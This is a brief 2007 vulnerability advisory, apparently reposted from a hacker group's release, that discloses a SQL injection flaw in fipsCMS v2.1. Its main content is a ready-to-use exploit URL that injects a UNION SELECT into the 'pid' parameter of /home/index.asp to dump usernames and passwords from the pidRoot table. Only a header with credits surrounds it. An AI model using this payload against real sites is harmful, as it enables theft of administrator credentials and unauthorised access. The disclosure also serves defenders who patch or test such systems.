fipsCMS v2.1 Remote SQL injection Vulnerability

2007-05-08T00:00:00
ID SECURITYVULNS:DOC:16954
Type securityvulns
Reporter Securityvulns
Modified 2007-05-08T00:00:00

Description

# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #

fipsCMS v2.1 Remote SQL injection Vulnerability // AYYILDIZ.ORG Gururla Sunar ...

Script: fipsCMS v2.1

Download: http://fipsasp.com/subs/login/Download.asp?ID=60&CatID=5&AccLvl=0

Author: iLker Kandemir <ilkerkandemir@mynet.com>

ThanKs: h0tturk,Ekin0x,Gencnesil,Gencturk,Ajann

# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #

Exploit:

/home/index.asp?pid='//union//select//0,username,password,3,4,5,6,7,8,9//from//pidRoot//

# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #